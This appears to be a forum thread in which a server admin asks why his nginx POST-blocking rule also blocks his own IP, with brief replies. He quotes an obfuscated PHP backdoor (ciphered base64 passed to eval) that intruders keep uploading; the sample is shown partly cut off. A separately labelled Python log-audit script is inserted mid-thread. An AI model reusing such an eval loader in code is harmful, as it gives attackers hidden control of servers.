Nginx
DIvan4ik, 2014-12-10 14:54:36

How to disable POST requests to nginx for everyone except yourself?

Good day!
There is a Debian server with ISPmanager 5 Lite installed, running nginx + Apache ITK.
On the server there are several sites on different CMSes: WordPress, Joomla, OpenCart, GetSimple... The sites are mostly new, but there are also old ones, even on Joomla 1.5.x.
Access is filtered by iptables; the people who have access are trusted.
I manage everything personally, well, or "almost" personally. The sites are commercial and are visited periodically. But apparently they are visited not only by clients but also by intruders... Through a still unknown hole on the server, PHP "backdoors" are constantly (no, really, constantly, and most likely by hand) uploaded, through which all sorts of horrors happen.
I thought "How much longer?" and found a solution:
Here is the main location of the nginx site config file:

location / {

                # PHP handlers: GET (and HEAD, which limit_except GET also lets through)
                # for everyone; any other method only from the listed address.
                location ~ [^/]\.ph(p\d*|tml)$ {
                        limit_except GET {
                                allow <MY_IP>;
                                deny all;
                        }
                        try_files /does_not_exists @fallback;
                }

                # static assets are served by nginx itself
                location ~* ^.+\.(jpg|jpeg|gif|png|svg|js|css|mp3|ogg|mpe?g|avi|zip|gz|bz2?|rar|swf)$ {
                        expires 7d;
                        try_files $uri $uri/ @fallback;
                }

                # everything else: the same method restriction, then hand over to @fallback
                location / {

                        limit_except GET {
                                allow <MY_IP>;
                                deny  all;
                        }
                        try_files /does_not_exists @fallback;
                }
        }

The request-method filtering rule WORKS and everything would be fine, BUT it blocks POST from my IP as well.
The logs are clear:
<MY_IP> - - [10/Dec/2014:11:40:06 +0300] "POST /index.php?option=com_rsform&Itemid=3 HTTP/1.1" 405

Why does my POST not get through either? It's day 3 and I'm suffering...
UPD: it is not a shell but a backdoor of the form:
<?php
$vGSDSHL = Array('1'=>'6', '0'=>'A', '3'=>'e ', '2'=>'a', '5'=>'y', '4'=>'v', '7'=>'H', '6'=>'p', '9'=>'l', '8'=>'r', 'A'=>'t', 'C'=>'G', 'B'=>'3', 'E'=>'1', 'D'=>'2', 'G'=>'i', 'F'=>'o', 'I'=>'B', 'H'=>'n', 'K'=>'M', 'J'=>'C', 'M'=>'8', 'L'=>'T', 'O'=>'u', '
function vZAHTCQ($v0ZDJ0Q, $vE54PQG){$vGJMOEG = ''; for($i=0; $i < strlen($v0ZDJ0Q); $i++){$vGJMOEG .= isset($vE54PQG[$v0ZDJ0Q[$i]]) ? $vE54PQG[$v0ZDJ0Q[$i]] : $v0ZDJ0Q[$i];}
return base64_decode($vGJMOEG);}
$v3MWBN6 = 'XCQEVCznPCQxP50aUJUZNYWfhCKBKDiGNYuZKkufhYuEhbUZNkUEhLuDNyUDv'.
'GUpJjFuvDawtBUjcs0GUDibNsUpJGiuhyhzVyrfqDQkVC94tG0aUJVC2yr9PfEztGPpJGiuhyhzVyrfqBdxhdaz2b'.
'QRUYfjV7XEhLwmXCi9hbQEt7invDzzPHN9VJ0aUJVq2yZutBVxlLW5NLWHegFmoC9O2d'.
'axhqoFXDd5Pba5qDr4h5PwL9dKLJupJuI6tb9nPDdfmJVwtDVnhqX5tBXxX5ggmLwmoC9O2dax'.
'hqoFXDEz3Qa93CdkVqi6tDZnVC9AhsPwKJupJuIxhqinVC9Ahdaw2yE6VJjgmLwmo7N9VQaAvy'.
'V6vEarVyafhqNnPHdOVC9AhsjgmLwmoCi9hb9OhsjHdENcqEhQT9NX'.
'
'wmUJ0jUChEtbNf2yaOUQVLLBNfPb9gPDrzPDz9P5juvqX5vqu6U7wmUJ0jUJ'.
'0jUJI5hqiEPbRj2qNnvqX5vquFXCQ5PbQZms0/UCQ5PbQZqDEzPJjHdENcPBi52qIxtCQx2CdxX5gj'.
'XCQ5PbQZms01U7NfPb9gPDrzPDz9P5juvqX5vqu6egFjUJ0jnoFjUJ'.
'0jXQaoLENTUYfjdENcPBi52qIxtCQx2CdxmJinTWaLdJupJG0jUJ0uqfNcLfAXis0aUQ'.
'VLLBNfPb9gPDrzPDz9P5juqfNcLfAXisupJHfmJbhEtbNf2yaOU7Vxtfr4hD9'.
'OmJuj3gFjUJ0j2CdzhCd5mJVUdQiolxWOKJ0fKYojLbafUWh4VyZuX5upJG0jUJIu2yTFUko'.
'gNJU6eg6aJj6bVyZkVC94tGIqTfaxhqiktDa82yTFXCwwUJiDmsIpJG0jUJ0uqfNcLfAXidwu2Efjcs0uVkwmUJ0jU7N9VCN4tD'.
'A6hsju25gjX7v6eg6aJj66hGjzhyEgV7uFXCQEVCznPCQxP5u6U7wmUJ0jUC9bm'.
'C9xPDdfmJinTWaLdQwHPCQxP5VVms0bXG0FtyoEmJinTWaLdQwHPCQxP5VVms0acs0uvqdf2QagvqNxm'.
'sumUJ0jUJ0jUJIqTfaxhqiktDa82yTFtyoEmJinTfdsdudsy5VUdQioqfzcTEoHqsuwUJizV'.
'qiFqBIzPBK6egFmUJ0jUC9bUJjz2qNxhqoFXQaYLfalsTdttyoE'.
'mJinTfdsdudsy5VUdQioqfzcTEoHqs9VmsIMnJ0FXQaYLfalsTdttyoEmJinTfdsdudsy5VUdQioqfzcTEoHqs9VUJWa'.
'UJizVqiFqBIzPBK6moFjUJ0jUJ0jU7Vxtfr4hD9OmJupJHfmJbhEtbNf2yaOUCQkVC94t9X'.
'YmJuj3gFjUJ0j2yvFUT0uqEIcTEitXB0rXEf6U7wmUJ0jUJ0jUJ0uvs0aUCQ5PbQZm0FjUJ0jUJ0jUJ0jUJ0GVyZztyTGUYf+U7'.
'IFPQaEtbQAhsj6l0FjUJ0jUJ0jUJ0jUJ0GPCzgqBh9PHN6tDRGUYf+U7IFP7h9PHN6tDRFmsgmUJ0jUJ0jUJ0jUJ0jUHVx'.
'tEaDhqXx2yaOUG0acGIqTfandudsTf9cLGgmUJ0jUJ0jUJ0jUJ0jUHNzhbdAtDi9UG0acGI02y'.
'Z6qDV9VJjHPDQbhdaAtDi9X5umUJ0jUJ0jUJ06egFjUJ0jUJ0jUCdk2CMjPDd52yQw2q69mJizmLwmUJ0jU7fjhyrxhs'.
'IpJG0jUJ0jUJ0jhqhztJjuqEIcTEitXB0rXEf6egFjUJ0jno6aJb9bmJI9tqIf3sjuqEIcTEitXDWHqsujmoFjU'.
'J0j2yvF2qNxhqoFXCi9hbQEt7invyNf2yaOms0bXGIbVyZkVC94t9a93C9xV7KFXDQkVC94tGPjlG0uhCdbvqdwV'.
'QazvBi6tDR6moFjUJ0jUJ0jUJinTWaLdQwHvsVVUYfjXCi9hbQEt7invyNf2yaOegFjUJ0jhyrxh'.
'oFjUJ0jUJ0jUJinTWaLdQwHvsVVUYfjXEN9vf9OhbMHeg66hGjjUydAP7iZmJinT'.
'WaLdQwHvsVVms0bXGIbVyZkVC94t9a93C9xV7KFXDQkVC94tGPjlG0'.
'uqEIcTEitXDWHqsujmoFjUJ0jvDQwtQaEPDd5qDhEtbKFXDQkVC94tGP'.
'jlG0uqEIcTEitXDWHqsupJbdR2qop';
eval(vZAHTCQ($v3MWBN6, $vGSDSHL));?>
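The access-log check a practitioner would run against a rule like this, as an added example that is not part of the original post and not nginx code: a small Python script that parses nginx combined-format lines (the format of the log line quoted above), skips GET and HEAD (the two methods `limit_except GET` leaves open to everyone, per the nginx documentation), and reports two things: non-GET requests from outside the allow list that still reached a PHP handler with a success status, and non-GET requests from the allow-listed address that were refused. The admin address 203.0.113.7, the sample log lines and the names `audit`, `Finding`, `ALLOWED_WRITERS` are assumptions made for the example; the page only shows <MY_IP>. One fact worth keeping in mind when reading such output: a request refused by `deny all` inside `limit_except` is answered with 403, so a 405 was produced by whatever handled the request after the access check passed, not by the access check itself.

```python
"""Audit nginx access-log lines against a limit_except GET allow list.

Added example, not the asker's code. Assumptions (not on the page): the
admin address is 203.0.113.7 (TEST-NET-3), the log uses nginx's default
"combined" format, and SAMPLE_LOG below is constructed for the demo.
"""
import ipaddress
import re
from dataclasses import dataclass

# The same pattern the asker's nginx config uses to route PHP handlers
# (`location ~ [^/]\.ph(p\d*|tml)$`; `location ~` is case-sensitive).
PHP_HANDLER = re.compile(r"[^/]\.ph(p\d*|tml)$")

# Fields of nginx's default "combined" log_format, as in the quoted line.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3})(?:\s|$)'
)

# Assumed admin address; the page only shows the placeholder <MY_IP>.
ALLOWED_WRITERS = [ipaddress.ip_network("203.0.113.7/32")]


@dataclass(frozen=True)
class Finding:
    ip: str
    method: str
    path: str
    status: int
    kind: str  # "bypass" or "lockout"


def is_php_handler(path: str) -> bool:
    """True if nginx would route this URI to the PHP location above."""
    return PHP_HANDLER.search(path) is not None


def is_allowed_writer(ip: str) -> bool:
    """True if the client address is inside the allow list."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ALLOWED_WRITERS)


def audit(lines):
    """Return findings for every non-GET/HEAD request in the log.

    limit_except GET permits GET and HEAD for everybody, so only other
    methods are subject to the allow/deny list. Two outcomes matter:
      bypass  - a client outside the list got a 2xx/3xx on a PHP handler,
                i.e. that request was not subject to the restriction;
      lockout - the allow-listed address itself was refused (403 is what
                `deny all` inside limit_except produces; a 405 came from
                whatever handled the request after the access check).
    """
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        method = m["method"]
        if method in ("GET", "HEAD"):
            continue
        path = m["target"].split("?", 1)[0]  # location matching ignores the query string
        status = int(m["status"])
        trusted = is_allowed_writer(m["ip"])
        if not trusted and status < 400 and is_php_handler(path):
            findings.append(Finding(m["ip"], method, path, status, "bypass"))
        elif trusted and status in (403, 405):
            findings.append(Finding(m["ip"], method, path, status, "lockout"))
    return findings


# Constructed sample lines (not real log data).
SAMPLE_LOG = [
    # the symptom from the question: the admin's own POST answered with 405
    '203.0.113.7 - - [10/Dec/2014:11:40:06 +0300] "POST /index.php?option=com_rsform&Itemid=3 HTTP/1.1" 405 166 "-" "Mozilla/5.0"',
    # untrusted POST correctly refused by deny all
    '198.51.100.23 - - [10/Dec/2014:11:41:02 +0300] "POST /index.php HTTP/1.1" 403 162 "-" "curl/7.38.0"',
    # untrusted POST that still reached a PHP handler: this request was not restricted
    '198.51.100.23 - - [10/Dec/2014:11:42:17 +0300] "POST /images/backdoor.php HTTP/1.1" 200 57 "-" "curl/7.38.0"',
    # GET and HEAD are open to everyone and must not be reported
    '198.51.100.23 - - [10/Dec/2014:11:43:00 +0300] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2014:11:43:01 +0300] "HEAD /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    # untrusted POST to a static asset: not a PHP handler, not reported here
    '198.51.100.23 - - [10/Dec/2014:11:44:30 +0300] "POST /style.css HTTP/1.1" 405 166 "-" "curl/7.38.0"',
]

if __name__ == "__main__":
    for f in audit(SAMPLE_LOG):
        print(f"{f.kind:7} {f.ip:15} {f.method} {f.path} -> {f.status}")
```

To use it on a real server, set ALLOWED_WRITERS to the addresses that are actually listed in the config and call `audit(open("/var/log/nginx/access.log"))`: a `lockout` line for your own address confirms the request was refused, and a `bypass` line shows a PHP request that the restriction did not apply to.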


2 answer(s)
Eugene, 2014-12-10
@Nc_Soft

You treat the symptoms.

Alexey Volegov, 2014-12-10
@EagleMoor

Probably because you allow yourself only GET.
Try it.
It's a very strange way, though. If all the shells get in through ISP, then give access to it only from work and that's it. From home, VPN to work and you will be happy. Well, and change the URL of the panel.
